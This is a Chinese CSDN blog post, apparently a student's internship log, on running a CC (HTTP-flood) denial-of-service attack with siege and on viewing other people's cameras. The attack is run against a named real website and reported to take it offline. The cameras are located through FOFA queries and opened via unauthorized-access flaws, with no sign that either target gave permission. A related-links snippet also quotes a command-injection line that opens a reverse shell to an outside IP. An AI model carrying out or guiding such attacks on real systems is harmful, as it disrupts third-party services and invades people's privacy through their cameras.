生产实习--启明星辰 第四天(实操关于CC攻击以及查看摄像头)

最新推荐文章于 2024-08-05 21:45:20 发布
最新推荐文章于 2024-08-05 21:45:20 发布
阅读量513 收藏 4
点赞数 7
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tuyhaaaaaa/article/details/140295150
版权

CC攻击

原理:CC(ChallengeCollapsar,挑战黑洞)攻击是DDoS攻击的一种类型,使用代理服务器向受害服务器发送 大量貌似合法的请求。

环境:Kali Linux,siege工具

具体步骤:首先,我们打开虚拟机kali linux,打开命令行,输入apt install siege下载我们所需要的工具。

之后利用命令 :siege -c 并发数目 -r 测试次数 目标网站 进行攻击,下面我以https://22k4.com/ 为例子来实现。

正常情况下我们是可以访问这个网址的:

接下来我们进行攻击:

我们就可以发现我们就进不去那个网站了,他会一直响应我们的请求:

我们关闭之后过一会便又可以再一次访问了。

到这CC攻击便完成了。

摄像头的查看

原理:根据已经知道的摄像头厂商,某个版本已经存在的漏洞进行访问,加上未授权漏洞,我们可以直接进行查看。

环境:fofa.info 

首先,我们进入fofa.info

根据fofa的语法输入对应的搜索条件(app="D_Link-DCS-4622" app="webcamXP-产品" ),点击搜索

点击想要查看的链接进入。

这个时候我们就要利用未授权访问,即没有对访问者进行严格的限制,我们可以直接拼接语句(在最后拼接后缀 )来访问他的数据库,得到用户和密码

点击登录,就可以查看

小作业

用python编写一个九九乘法表如下

TuYHAAAAAA
关注
漏洞复现:WVP-GB28181摄像头管理平台 user 信息泄露
weixin_42207802的博客
05-17 457
漏洞复现:WVP-GB28181摄像头管理平台 user 信息泄露。
启明星防火墙配置手册-天清汉马
08-15
启明星防火墙配置手册-天清汉马
【漏洞复现】网络摄像头——弱口令
LongL_GuYu的博客
07-08 1468
诸多主流摄像头存在弱口令
关于路由器,摄像头,防火墙的搜索方法(IOT设备)
m0_52027565的博客
11-16 1万+
关于路由器,摄像头,防火墙的搜索方法(IOT设备) 目录关于路由器,摄像头,防火墙的搜索方法(IOT设备)前言一、路由器,交换机(WiFi)**常规引擎**安全引擎二、摄像头(Camera)常规引擎:安全引擎:三、防火墙(WAF)常规引擎安全引擎总结 前言 Google是一个功能强大的搜索引擎,通过预定义命令,可以查询出令人难以置信的结果。利用Google搜索智能搜索,甚至可以进入部分远程服务器获取机密、搜索敏感信息,造成信息泄露。本文从安全角度,对Google这一工具进行深度信息挖掘。。 提示:以下是
未授权访问后13个
最新发布
lhdbk______的博客
08-05 1141
未授权访问
海康威视CVE-2017-7921漏洞查找与利用
AngrySnack的博客
10-11 2558
海康威视 CVE-2017-7921 漏洞
fofa的有趣搜索语句小记
闵行小鱼塘
07-07 5331
记录下一些有趣的fofa搜索语句
FOFA网络空间安全搜索引擎的使用
weixin_71208450的博客
07-09 1743
FOFA主要针对公网上的资产进行探测,类似于谷歌地图上的建筑物(IP地址),虽然可以看到建筑物的外部结构和规模,但无法了解内部的情况。不同的是,这些数据不仅包括像谷歌或百度一样的网页,还包括像摄像头、打印机、数据库、操作系统等资产。我们可以使用FOFA搜索一些我们想要用的网址,比如最近比较火的ChatGPT,我们可以通过在FOFA上搜索网站标题,找到包含ChatGPT关键词的网站。FOFA是一款网络空间测绘的搜索引擎,旨在帮助用户以搜索的方式查找公网上的互联网资产。进入FOFA的官网,可以查询所有语法。
启明星USG-3610D密码恢复.txt
08-05
启明星USG-3610D密码恢复.txt
启明星-天清异常流量清洗系统ADM-GuardWeb管理用户手册V3.6.3.1.pdf
07-07
启明星-天清异常流量清洗系统ADM-GuardWeb管理用户手册V3.6.3.1,
启明星蜜罐-虚拟机安装部署
09-09
软件版蜜罐在虚拟机上的安装部署
启明星-企业网络安全解决方案.doc
06-22
启明星-企业网络安全解决方案.doc
fofa自动化爬虫脚本更新+详解
qq_50854662的博客
09-23 1306
fofa自动化爬虫脚本更新+详解 起因 最近要用到fofa爬虫,为什么要用爬虫不用api,问就是穷,想起来之前写过一个相关的脚本:Fofa-python-脚本,是很久以前写的了,之前写的时候有点问题,昨天重新修改了一下,记录一下整个过程 关于fofa 在其他大佬博客上摘抄的FOFA简介及使用教程 FOFA 是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配,例如进行漏洞影响范围分析、应用分布统计、应用流行度等。 FOFA 搜索引擎检索到.
天哪!还有这些逆天的fofa​语句?(二)
Liyu_6618的博客
02-26 591
天哪!还有这些逆天的fofa​语句?(二)
fofa 是一个什么样的工具
keyboard专栏
04-28 2093
FOFA (Fingerprint of Full Asset) 是一个基于网络的搜索引擎,主要用于信息安全领域,特别是在网络空间资产发现和安全漏洞研究方面。这个工具可以帮助安全研究人员和企业安全团队发现并分析互联网上的设备、服务器、网站和其他相关资产的公开信息。
实战案例-Fofa拿下pikachu服务器保姆级别教程(文件上传下载&webshell)
jnszstmei的博客
04-14 1339
输入127.0.0.1 & 1.exe -e cmd 47.109.189.205 5566(47.109.189.205为自己服务器的ip),拿到服务器的控制权
NUUO 网络摄像头命令执行漏洞
weixin_45971758的博客
02-06 1392
NUUO是中国台湾省NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。网络视频记录器的CPU为Marvell Kirkwood 88F6281,CPU架构为基于ARMv5架构。该系统中有busybox,一个精简的环境,包含了许多最常用的UNIX命令和工具,如ls、cp、mv、grep、find、awk、sed等。无法执行复杂的任务和其他架构的程序。
【未授权访问】我就这么容易被曝光了吗?
热门推荐
kimol君的博客
08-06 2万+
【未授权访问】我怎么被监控了?前言一、洞穿一切1.获取用户名2.下载摄像头配置文件3.获取监控快照二、Fofa无边三、双管齐下1.爬取设备信息2.自动化检测写在最后 前言 时光转瞬,上一篇文章的时间定格在了半年前的情人节。由于各种原因,已经好久没有更新文章了,承蒙大家的喜爱,陆续收到了许多小伙伴的“催更”。有一说一:“心里是暖的❤️”。 愿今后自己可以不忘初心,继续前行,将心中的一些想法,一些感受,一些技巧,一些故事与大家分享。 恰巧前不久看到某康威视网络摄像头存在漏洞,于是,作为对万物充满好奇的少年,
网络空间搜索引擎Fofa的简单使用
weixin_44110913的博客
08-02 5774
目录 Fofa 逻辑运算符 查找使用指定应用的IP 查找使用指定协议的IP 查找开放指定端口的IP 查找IP或网段的信息 查找使用指定css或js的网站 使用Fofa API接口 其他 Fofa Fofa 是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配。例如进行漏洞影响范围分析、应用分布统计、应用流行度等。在渗透测试过程中,Fofa能帮助测试人员快速发现目标资产...
NIPS HA监控与调试指南 - 启明星入侵防御系统
"该资源是关于《数据库原理与应用》考试题库中关于HA(高可用性)监控与调试的部分,特别关注启明星天清IPS系统的操作。内容包括查看HA配置、HA状态以及HA内核信息的命令和解析。" 在HA(高可用性)监控与调试中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值